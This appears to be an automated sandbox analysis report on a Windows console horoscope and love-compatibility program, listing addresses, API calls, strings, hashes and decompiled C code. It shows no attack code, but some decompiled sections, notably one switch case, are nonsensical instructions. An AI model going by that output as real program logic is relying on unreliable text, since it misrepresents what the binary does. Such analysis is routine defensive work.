                                                                          0x013d7bec
                                                                          0x013d7bed
                                                                          0x013d7bee
                                                                          0x013d7bef
                                                                          0x013d7bf4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7bfc
                                                                          0x013d7c06
                                                                          0x013d7c0b
                                                                          0x013d7c10
                                                                          0x013d7c12
                                                                          0x013d7c17
                                                                          0x013d7c1c
                                                                          0x013d7c26
                                                                          0x013d7c2b
                                                                          0x013d7c35
                                                                          0x013d7c38
                                                                          0x013d7c39
                                                                          0x013d7c3a
                                                                          0x013d7c3b
                                                                          0x013d7c3c
                                                                          0x013d7c41
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7c49
                                                                          0x013d7c53
                                                                          0x013d7c58
                                                                          0x013d7c5d
                                                                          0x013d7c5f
                                                                          0x013d7c64
                                                                          0x013d7c69
                                                                          0x013d7c73
                                                                          0x013d7c78
                                                                          0x013d7c7d
                                                                          0x013d7c82
                                                                          0x013d7c85
                                                                          0x013d7c86
                                                                          0x013d7c87
                                                                          0x013d7c88
                                                                          0x013d7c89
                                                                          0x013d7c8e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7c96
                                                                          0x013d7ca0
                                                                          0x013d7ca5
                                                                          0x013d7caa
                                                                          0x013d7cac
                                                                          0x013d7cb1
                                                                          0x013d7cb6
                                                                          0x013d7cc0
                                                                          0x013d7cc5
                                                                          0x013d7cca
                                                                          0x013d7ccf
                                                                          0x013d7cd2
                                                                          0x013d7cd3
                                                                          0x013d7cd4
                                                                          0x013d7cd5
                                                                          0x013d7cd6
                                                                          0x013d7cdb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7ce3
                                                                          0x013d7ced
                                                                          0x013d7cf2
                                                                          0x013d7cf7
                                                                          0x013d7cf9
                                                                          0x013d7cfe
                                                                          0x013d7d03
                                                                          0x013d7d0d
                                                                          0x013d7d12
                                                                          0x013d7d1c
                                                                          0x013d7d1f
                                                                          0x013d7d20
                                                                          0x013d7d21
                                                                          0x013d7d22
                                                                          0x013d7d23
                                                                          0x013d7d28
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7d30
                                                                          0x013d7d3a
                                                                          0x013d7d3f
                                                                          0x013d7d44
                                                                          0x013d7d46
                                                                          0x013d7d4b
                                                                          0x013d7d50
                                                                          0x013d7d5a
                                                                          0x013d7d5f
                                                                          0x013d7d64
                                                                          0x013d7d69
                                                                          0x013d7d6c
                                                                          0x013d7d6d
                                                                          0x013d7d6e
                                                                          0x013d7d6f
                                                                          0x013d7d70
                                                                          0x013d7d75
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7d7d
                                                                          0x013d7d87
                                                                          0x013d7d8c
                                                                          0x013d7d91
                                                                          0x013d7d93
                                                                          0x013d7d98
                                                                          0x013d7d9d
                                                                          0x013d7da7
                                                                          0x013d7dac
                                                                          0x013d7db1
                                                                          0x013d7db6
                                                                          0x013d7db9
                                                                          0x013d7dba
                                                                          0x013d7dbb
                                                                          0x013d7dbc
                                                                          0x013d7dbd
                                                                          0x013d7dc2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7dca
                                                                          0x013d7dd4
                                                                          0x013d7dd9
                                                                          0x013d7dde
                                                                          0x013d7de0
                                                                          0x013d7de5
                                                                          0x013d7dea
                                                                          0x013d7df4
                                                                          0x013d7df9
                                                                          0x013d7e03
                                                                          0x013d7e06
                                                                          0x013d7e07
                                                                          0x013d7e08
                                                                          0x013d7e09
                                                                          0x013d7e0a
                                                                          0x013d7e0f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7e17
                                                                          0x013d7e21
                                                                          0x013d7e26
                                                                          0x013d7e2b
                                                                          0x013d7e2d
                                                                          0x013d7e32
                                                                          0x013d7e37
                                                                          0x013d7e41
                                                                          0x013d7e46
                                                                          0x013d7e4b
                                                                          0x013d7e50
                                                                          0x013d7e53
                                                                          0x013d7e54
                                                                          0x013d7e55
                                                                          0x013d7e56
                                                                          0x013d7e57
                                                                          0x013d7e5c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7e61
                                                                          0x013d7e6b
                                                                          0x013d7e70
                                                                          0x013d7e75
                                                                          0x013d7e77
                                                                          0x013d7e7c
                                                                          0x013d7e81
                                                                          0x013d7e8b
                                                                          0x013d7e90
                                                                          0x013d7e95
                                                                          0x013d7e9a
                                                                          0x013d7e9d
                                                                          0x013d7e9e
                                                                          0x013d7e9f
                                                                          0x013d7ea0
                                                                          0x013d7ea1
                                                                          0x013d7ea6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7ebe
                                                                          0x013d7ec3
                                                                          0x013d7ec8
                                                                          0x013d7ec9
                                                                          0x013d7ece
                                                                          0x013d7ed8
                                                                          0x013d7edd
                                                                          0x013d7ee0
                                                                          0x013d7ee1
                                                                          0x013d7ee6
                                                                          0x013d7ef0
                                                                          0x013d7ef5
                                                                          0x013d7ef9
                                                                          0x013d7f08
                                                                          0x013d7f09
                                                                          0x013d7f0e
                                                                          0x013d7f13
                                                                          0x013d7f16
                                                                          0x013d7f1b
                                                                          0x013d7f22
                                                                          0x013d7f29
                                                                          0x013d7f30
                                                                          0x013d7f35
                                                                          0x013d7f36
                                                                          0x013d7f36
                                                                          0x013d7f3f
                                                                          0x00000000
                                                                          0x013d7f3f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7374
                                                                          0x013d737e
                                                                          0x013d7383
                                                                          0x013d7388
                                                                          0x013d738a
                                                                          0x013d738f
                                                                          0x013d7394
                                                                          0x013d739e
                                                                          0x013d73a3
                                                                          0x013d73a8
                                                                          0x013d73ad
                                                                          0x013d73b4
                                                                          0x013d73b9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d73c1
                                                                          0x013d73cb
                                                                          0x013d73d0
                                                                          0x013d73d5
                                                                          0x013d73d7
                                                                          0x013d73dc
                                                                          0x013d73e1
                                                                          0x013d73eb
                                                                          0x013d73f0
                                                                          0x013d73fa
                                                                          0x013d7401
                                                                          0x013d7406
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d740e
                                                                          0x013d7418
                                                                          0x013d741d
                                                                          0x013d7422
                                                                          0x013d7424
                                                                          0x013d7429
                                                                          0x013d742e
                                                                          0x013d7438
                                                                          0x013d743d
                                                                          0x013d7442
                                                                          0x013d7447
                                                                          0x013d744e
                                                                          0x013d7453
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d745b
                                                                          0x013d7465
                                                                          0x013d746a
                                                                          0x013d746f
                                                                          0x013d7471
                                                                          0x013d7476
                                                                          0x013d747b
                                                                          0x013d7485
                                                                          0x013d748a
                                                                          0x013d748f
                                                                          0x013d7494
                                                                          0x013d749b
                                                                          0x013d74a0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d74a8
                                                                          0x013d74b2
                                                                          0x013d74b7
                                                                          0x013d74bc
                                                                          0x013d74be
                                                                          0x013d74c3
                                                                          0x013d74c8
                                                                          0x013d74d2
                                                                          0x013d74d7
                                                                          0x013d74e1
                                                                          0x013d74e8
                                                                          0x013d74ed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d74f5
                                                                          0x013d74ff
                                                                          0x013d7504
                                                                          0x013d7509
                                                                          0x013d750b
                                                                          0x013d7510
                                                                          0x013d7515
                                                                          0x013d751f
                                                                          0x013d7524
                                                                          0x013d7529
                                                                          0x013d752e
                                                                          0x013d7535
                                                                          0x013d753a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7542
                                                                          0x013d754c
                                                                          0x013d7551
                                                                          0x013d7556
                                                                          0x013d7558
                                                                          0x013d755d
                                                                          0x013d7562
                                                                          0x013d756c
                                                                          0x013d7571
                                                                          0x013d7576
                                                                          0x013d757b
                                                                          0x013d7582
                                                                          0x013d7587
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d758f
                                                                          0x013d7599
                                                                          0x013d759e
                                                                          0x013d75a3
                                                                          0x013d75a5
                                                                          0x013d75aa
                                                                          0x013d75af
                                                                          0x013d75b9
                                                                          0x013d75be
                                                                          0x013d75c8
                                                                          0x013d75cf
                                                                          0x013d75d4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d75dc
                                                                          0x013d75e6
                                                                          0x013d75eb
                                                                          0x013d75f0
                                                                          0x013d75f2
                                                                          0x013d75f7
                                                                          0x013d75fc
                                                                          0x013d7606
                                                                          0x013d760b
                                                                          0x013d7610
                                                                          0x013d7615
                                                                          0x013d761c
                                                                          0x013d7621
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7629
                                                                          0x013d7633
                                                                          0x013d7638
                                                                          0x013d763d
                                                                          0x013d763f
                                                                          0x013d7644
                                                                          0x013d7649
                                                                          0x013d7653
                                                                          0x013d7658
                                                                          0x013d765d
                                                                          0x013d7662
                                                                          0x013d7669
                                                                          0x013d766e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7676
                                                                          0x013d7680
                                                                          0x013d7685
                                                                          0x013d768a
                                                                          0x013d768c
                                                                          0x013d7691
                                                                          0x013d7696
                                                                          0x013d76a0
                                                                          0x013d76a5
                                                                          0x013d76af
                                                                          0x013d76b6
                                                                          0x013d76bb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d76c0
                                                                          0x013d76ca
                                                                          0x013d76cf
                                                                          0x013d76d4
                                                                          0x013d76d6
                                                                          0x013d76db
                                                                          0x013d76e0
                                                                          0x013d76ea
                                                                          0x013d76ef
                                                                          0x013d76f4
                                                                          0x013d76f9
                                                                          0x013d7700
                                                                          0x013d7705
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d771d
                                                                          0x013d7722
                                                                          0x013d7727
                                                                          0x013d7728
                                                                          0x013d772d
                                                                          0x013d7737
                                                                          0x013d773f
                                                                          0x013d7740
                                                                          0x013d7745
                                                                          0x013d774f
                                                                          0x013d7758
                                                                          0x013d7767
                                                                          0x013d7768
                                                                          0x013d776d
                                                                          0x013d7772
                                                                          0x013d7777
                                                                          0x013d7781
                                                                          0x013d7786
                                                                          0x013d778b
                                                                          0x013d7795
                                                                          0x013d779a
                                                                          0x013d779f
                                                                          0x013d77a9
                                                                          0x013d77ae
                                                                          0x013d77b1
                                                                          0x013d77b8
                                                                          0x013d77c4
                                                                          0x013d77c5
                                                                          0x013d77c5
                                                                          0x013d77ce
                                                                          0x00000000
                                                                          0x013d77ce
                                                                          0x00000000

                                                                          APIs
                                                                          • __wsystem.LIBCMT ref: 013D708D
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D70A5
                                                                          • _wprintf.LIBCMT ref: 013D70C7
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D70E9
                                                                          • _wprintf.LIBCMT ref: 013D70FD
                                                                          • _wprintf.LIBCMT ref: 013D7111
                                                                          • _wprintf.LIBCMT ref: 013D7125
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • __wsystem.LIBCMT ref: 013D715C
                                                                          • _wprintf.LIBCMT ref: 013D7181
                                                                          • _wprintf.LIBCMT ref: 013D71F1
                                                                          • _wprintf.LIBCMT ref: 013D71FB
                                                                          • _wprintf.LIBCMT ref: 013D7226
                                                                          • _wprintf.LIBCMT ref: 013D7230
                                                                          • __wsystem.LIBCMT ref: 013D7247
                                                                          • __wsystem.LIBCMT ref: 013D726F
                                                                          • _wprintf.LIBCMT ref: 013D7294
                                                                          • _wprintf.LIBCMT ref: 013D72A8
                                                                          • _wprintf.LIBCMT ref: 013D72C2
                                                                          • _wprintf.LIBCMT ref: 013D72DA
                                                                          • _wprintf.LIBCMT ref: 013D72FC
                                                                          • _wprintf.LIBCMT ref: 013D731A
                                                                          • _wprintf.LIBCMT ref: 013D732E
                                                                          • __wsystem.LIBCMT ref: 013D7345
                                                                          • __wsystem.LIBCMT ref: 013D7722
                                                                          • _wprintf.LIBCMT ref: 013D7737
                                                                          • _wprintf.LIBCMT ref: 013D774F
                                                                          • _wprintf.LIBCMT ref: 013D776D
                                                                          • _wprintf.LIBCMT ref: 013D7781
                                                                          • _wprintf.LIBCMT ref: 013D7795
                                                                          • _wprintf.LIBCMT ref: 013D77A9
                                                                          • _wprintf.LIBCMT ref: 013D77D4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__wsystem$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_free_wscanf
                                                                          • String ID: Enter any key.....$WE HOPE THAT IT WAS HELPFUL$%s$Enter any key....$ THE SYSTEM WILL RESTART IN FEW SECONDS!!!$%$%d$------------------------------------------------------------------$..-"-._.-"-._.-$..-"-._.-"-._.-$Age=%d$Enter any key to continue...$HERE IS WHAT YOU ARE!!!$Name: %s$Sex=%c$YOUR LUCKY NUMBERS ARE: %d$Your horoscope sign is Aquarius-The Water Bearer$aquarius AND AQUARIUS LOVE COMPATIBILITY$aquarius AND ARIES LOVE COMPATIBILITY$aquarius AND CANCER LOVE COMPATIBILITY$aquarius AND CAPRICORN LOVE COMPATIBILITY$aquarius AND GEMINI LOVE COMPATIBILITY$aquarius AND LEO LOVE COMPATIBILITY$aquarius AND LIBRA LOVE COMPATIBILITY$aquarius AND PISCES LOVE COMPATIBILITY$aquarius AND SAGGITARIUS LOVE COMPATIBILITY$aquarius AND SCORPIO LOVE COMPATIBILITY$aquarius AND TAURUS LOVE COMPATIBILITY$aquarius AND VIRGO LOVE COMPATIBILITY$cls$gfff
                                                                          • API String ID: 2876428006-1727141512
                                                                          • Opcode ID: 411443673938fcf1a13e8bdd26ccffebd66ca904447440ef9f05d237bc15db46
                                                                          • Instruction ID: 095044eab255315302c02f0866cc41f8e38a1779e17f36f46639e8677855d75b
                                                                          • Opcode Fuzzy Hash: 411443673938fcf1a13e8bdd26ccffebd66ca904447440ef9f05d237bc15db46
                                                                          • Instruction Fuzzy Hash: 67F1EFB360024AABD700BFEEBD45E6F776DABA639CF02411CF55466204EB7488158B72
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D2E50, Relevance: 145.7, APIs: 48, Strings: 35, Instructions: 494COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 69%
                                                                          			E013D2E50(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, DWORD* _a8, int _a12, intOrPtr _a16, intOrPtr _a85, intOrPtr _a939605320, intOrPtr _a1409744949, intOrPtr _a1710096673) {
				signed int _v0;
				int _v4;
				char* _v8;
				signed int _v12;
				char _v15;
				char* _v16;
				signed int _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char _v39;
				char* _v40;
				char* _v44;
				char* _v48;
				char _v50;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				DWORD* _v72;
				DWORD* _v84;
				char* _v88;
				char* _v92;
				DWORD* _v96;
				signed int _v100;
				DWORD* _v128;
				char* _v132;
				char _v133;
				char* _v136;
				char* _v140;
				DWORD* _v144;
				signed int _v148;
				char _v149;
				DWORD* _v176;
				char* _v180;
				char* _v184;
				signed int _v188;
				DWORD* _v192;
				DWORD* _v196;
				DWORD* _v220;
				char* _v224;
				char* _v228;
				char* _v232;
				signed int _v288;
				DWORD* _v292;
				DWORD* _v296;
				signed int _v316;
				DWORD* _v320;
				DWORD* _v324;
				char* _v328;
				DWORD* _v348;
				char* _v352;
				char* _v356;
				char _v360;
				DWORD* _v364;
				signed int _v368;
				DWORD* _v396;
				char _v400;
				char* _v404;
				char* _v408;
				char* _v412;
				DWORD* _v416;
				signed int _v420;
				DWORD* _v448;
				char* _v452;
				char* _v456;
				char* _v460;
				intOrPtr _v234799794;
				intOrPtr _v234799805;
				signed int _v950997987;
				int __ebp;
				signed int _t1051;
				void* _t1087;
				char _t1101;
				signed int _t1103;
				void* _t1108;
				void* _t1112;

				_t1115 = __eflags;
				_t1087 = __ecx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				E013DB418(__ebx, _t1092, __eflags, "cls");
				_t1101 = _a12;
				_push(_t1101);
				_push("Name: %s");
				 *0x13fe250 = 0x30037;
				E013DB9F5(__ebx, _t1092, __edi, _t1101, __eflags);
				_t1098 = _a8;
				_push(0x7da);
				_push("Age=%d");
				 *0x13fe250 = 0x40037;
				_v28 = 0x7da - _a8;
				E013DB9F5(__ebx, _t1092, _a8, _t1101, __eflags);
				_t1085 = _a16;
				 *0x13fe250 = 0x50037;
				_push(E013DC111(_a16));
				_push("Sex=%c");
				E013DB9F5(_a16, _t1092, _a8, _t1101, _t1115);
				_t1108 = (_t1103 & 0xfffffff8) - 0x2c + 0x20;
				E013D1640();
				_v24 = "\n*  You tend to be very patient, practical and dedicated.";
				_v20 = "\n*  You are usually very cautious when dealing with people, life and money.";
				_v16 = "\n*  You have a curious power of dominating others, even when not conscious of trying to do so.";
				_v12 = "\n*  If you are in love, you are generous to the last degree, and will consider no sacrifice too great for the person you care for.";
				_v8 = "\n*  If you are enemy, you will fight with the most determined obstinacy.";
				_t1051 = E013D1C60(_a16, _t1087, _a8, _t1101, _t1115) - 1;
				if(_t1051 > 5) {
					L29:
					E013D87E0();
					return  *0x13d0000();
				} else {
					do {
						switch( *((intOrPtr*)(_t1051 * 4 +  &M013D35C4))) {
							case 0:
								E013DB418(_t1085, _t1092, _t1116, "cls");
								_t1093 = _t1101;
								E013D1C00(_t1085, _t1101, _t1098, _t1101, _t1116, _t1085, _t1098);
								E013D1640();
								_push("HERE IS WHAT YOU ARE!!!\n");
								 *0x13fe250 = 0x90001;
								E013DB9F5(_t1085, _t1101, _t1098, _t1101, _t1116);
								_t1088 = _a4;
								_t1110 = _t1108 + 0x10;
								 *0x13fe250 = 0xa0001;
								if(_t1088 <= 0xa) {
									_v44 = _t1088;
									_t1058 = _t1088;
								} else {
									_t1082 = (0x66666667 * _t1088 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t1088 >> 0x20 >> 2);
									_t1096 = _t1082 + _t1082 * 4;
									_t1093 = _t1082 + _t1082 * 4 + _t1096;
									_t1058 = _t1088 - _t1082 + _t1082 * 4 + _t1096;
									_v44 = _t1058;
								}
								if(_t1058 == 0) {
									_v44 = 5;
									_t1058 = _v44;
								}
								_v40 = _t1058;
								_v32 = 1;
								_v36 = _t1110 + _t1058 + _t1058 + _t1058 + _t1058 + 0x20;
								while(1) {
									_t1120 = _v40 - 0x28;
									if(_v40 > 0x28) {
										break;
									}
									_t1093 =  *_v36;
									_push( *_v36);
									_push("\n\n%s");
									E013DB9F5(_t1085,  *_v36, _t1098, _t1101, _t1120);
									_push("\nEnter any key....");
									E013DB9F5(_t1085,  *_v36, _t1098, _t1101, _t1120);
									_t1110 = _t1110 + 0xc;
									E013EDBFD(_t1085, _t1098, _t1101, _t1120);
									_t1090 = _v44;
									_v40 =  &(_v40[_t1090]);
									_t1091 = _t1090 + _t1090;
									_t1088 = _t1090 + _t1090 + _t1091;
									_v36 =  &(_v36[_t1090 + _t1090 + _t1091]);
									_t1077 =  &(_v32[1]);
									_v32 = _t1077;
									_t1121 = _t1077 - 6;
									if(_t1077 < 6) {
										continue;
									}
									break;
								}
								_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
								E013DB9F5(_t1085, _t1093, _t1098, _t1101, _t1121);
								_push("\n\n\n\n\nEnter any key.....");
								E013DB9F5(_t1085, _t1093, _t1098, _t1101, _t1121);
								_t1112 = _t1110 + 8;
								E013EDBFD(_t1085, _t1098, _t1101, _t1121);
								goto L28;
							case 1:
								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
								__edx = __esi;
								E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D1640();
								__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
								goto L28;
							case 2:
								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
								__edx = __esi;
								E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D1640();
								_push("------------------------------------------------------------------");
								 *0x13fe250 = 0xa0005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0xc + __esp;
								_push("------------------------------------------------------------------");
								 *0x13fe250 = 0x120005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__eax = _a4;
								__esp = 4 + __esp;
								__ecx = __eax + __eax;
								_push(__eax + __eax);
								_push("YOUR LUCKY NUMBERS ARE: %d\t");
								 *0x13fe250 = 0xe000a;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = _a4;
								__edx =  &(_a4[2]);
								_push(__edx);
								_push("%d\t");
								E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _a4;
								__ecx = _a4 + _a4 * 8;
								__eax = 0x66666667;
								__edx = 0x66666667 * __ecx >> 0x20;
								__eax = 0x66666667 * __ecx;
								__edx = 0x66666667 * __ecx >> 0x20 >> 1;
								__edx = __edx >> 0x1f;
								__eax = __edx + (__edx >> 0x1f);
								_push(__edx + (__edx >> 0x1f));
								_push("%d\t");
								E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = 0x66666667;
								__edx = 0x66666667 * _a4 >> 0x20;
								__eax = 0x66666667 * _a4;
								__edx = 0x66666667 * _a4 >> 0x20 >> 2;
								__edx = __edx >> 0x1f;
								__eax = __edx + (__edx >> 0x1f);
								__eax + __eax * 4 = __eax + __eax * 4 + __eax + __eax * 4;
								_push(__eax + __eax * 4 + __eax + __eax * 4);
								_push("%d\t");
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								_push("Enter any key to continue...");
								 *0x13fe250 = 0x160032;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0x24 + __esp;
								__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
								goto L28;
							case 3:
								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
								__edx = __esi;
								E013D1C00(__ebx, __esi, __edi, __esi, __eflags, __ebx, __edi) = E013D1640();
								__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
								__eax = __eax - 1;
								__eflags = __eax - 0xb;
								if(__eflags <= 0) {
									switch( *((intOrPtr*)(__eax * 4 +  &M013D35DC))) {
										case 0:
											goto L15;
										case 1:
											goto L16;
										case 2:
											goto L17;
										case 3:
											goto L18;
										case 4:
											goto L19;
										case 5:
											goto L20;
										case 6:
											goto L21;
										case 7:
											goto L22;
										case 8:
											goto L23;
										case 9:
											goto L24;
										case 0xa:
											goto L25;
										case 0xb:
											goto L26;
									}
								}
								goto L28;
							case 4:
								_push(E013DB07D());
								__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 4 + __esp;
								__eax = E013D1E40(__edi);
								goto L28;
							case 5:
								__eax = E013DC543(0);
								_push(cs);
								asm("das");
								__eflags = __eax - 0x3d300c01;
								 *(__esi + __eax) =  *(__esi + __eax) + __esi;
								__eflags = __eax - 0x3d310d01;
								__ebx = __edi + __ebx;
								__al = __al ^ 0x0000003d;
								 *((intOrPtr*)(__ebx + 0x41013d35)) =  *((intOrPtr*)(__ebx + 0x41013d35)) + __edi;
								 *0x3d319101 =  *0x3d319101 ^ __edi;
								__ecx = __ecx + __esp;
								 *0x3d323101 =  *0x3d323101 ^ __edi;
								 *((intOrPtr*)(__ecx - 0x2efec2ce)) =  *((intOrPtr*)(__ecx - 0x2efec2ce)) + __eax;
								__bh = __bh ^  *0x3d332101;
								 *((intOrPtr*)(0x33 + __ecx)) =  *((intOrPtr*)(0x33 + __ecx)) + __esi;
								__eflags = __eax - 0x3d33c101;
								 *__ecx = __edx +  *__ecx;
								__al = __al ^ 0x0000003d;
								 *((intOrPtr*)(0x34 + __ecx)) =  *((intOrPtr*)(0x34 + __ecx)) + __esp;
								__eflags = __eax - 0x3d34ae01;
								__esp = __esp + __ecx;
								asm("int3");
								asm("int3");
								asm("int3");
								_push(__ebp);
								__ebp = __esp;
								__esp = __esp - 0x18;
								_push(__ebx);
								_push(__esi);
								_push(__edi);
								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
								__esi = _v56;
								_push(__esi);
								_push("Name: %s");
								 *0x13fe250 = 0x30037;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edi = _v60;
								0x7da = 0x7da - __edi;
								_push(0x7da);
								_push("Age=%d");
								 *0x13fe250 = 0x40037;
								_v84 = 0x7da - __edi;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__ebx = _v52;
								__eax = __bl;
								 *0x13fe250 = 0x50037;
								_push(E013DC111(__bl));
								_push("Sex=%c");
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0x20 + __esp;
								__eax = E013D16D0();
								_v96 = "\n*  You are widely known for your dual personalities and ability to change mood from moment to moment.";
								_v92 = "\n*  Although you hate to be tied down, you make lively, entertaining and romantic partners, even if you can be rather fickle if bored or unhappy.";
								_v88 = "\n*  The twin sides of your nature are perpetually pulling in opposite directions.";
								__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
								__eax = __eax - 1;
								__eflags = __eax - 5;
								if(__eflags > 0) {
									L61:
									_push("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
									__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
									__esp = 4 + __esp;
									__eax =  *0x13d0000();
									_pop(__edi);
									_pop(__esi);
									_pop(__ebx);
									return __eax;
								} else {
									do {
										switch( *((intOrPtr*)(__eax * 4 +  &M013D3CEC))) {
											case 0:
												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
												__edx = __esi;
												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi) = E013D16D0();
												_push("HERE IS WHAT YOU ARE!!!\n");
												 *0x13fe250 = 0x90001;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__ecx = _v0;
												__esp = 0x10 + __esp;
												 *0x13fe250 = 0xa0001;
												__eflags = __ecx - 0xa;
												if(__ecx <= 0xa) {
													_a4 = __ecx;
													__eax = __ecx;
												} else {
													__eax = 0x66666667;
													__edx = 0x66666667 * __ecx >> 0x20;
													__eax = 0x66666667 * __ecx;
													__edx = 0x66666667 * __ecx >> 0x20 >> 2;
													__eax = __edx + (__edx >> 0x1f);
													__edx = __eax + __eax * 4;
													__edx = __eax + __eax * 4 + __eax + __eax * 4;
													__eax = __ecx;
													__eax = __ecx - __edx;
													_a4 = __eax;
												}
												__eflags = __eax;
												if(__eax == 0) {
													_a4 = 5;
													__eax = _a4;
												}
												_a12 = __eax;
												__eax = __eax + __eax;
												__eax = __eax + __eax;
												__eflags = __eax;
												__eax = __ebp + __eax - 0x1c;
												_v16 = 1;
												_v12 = __eax;
												while(1) {
													__eflags = _a12 - 0x23;
													if(__eflags > 0) {
														break;
													}
													__ecx = _v12;
													__edx =  *_v12;
													_push(__edx);
													_push("\n\n%s");
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													_push("\nEnter any key....");
													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
													__esp = 0xc + __esp;
													__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
													__ecx = _a4;
													_a12 = _a12 + __ecx;
													__eax = _v16;
													__ecx = __ecx + __ecx;
													_v12 =  &(_v12[__ecx]);
													__eax =  &(_v16[1]);
													_v16 = __eax;
													__eflags = __eax - 6;
													if(__eflags < 0) {
														continue;
													}
													break;
												}
												_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												_push("\n\n\n\n\nEnter any key.....");
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
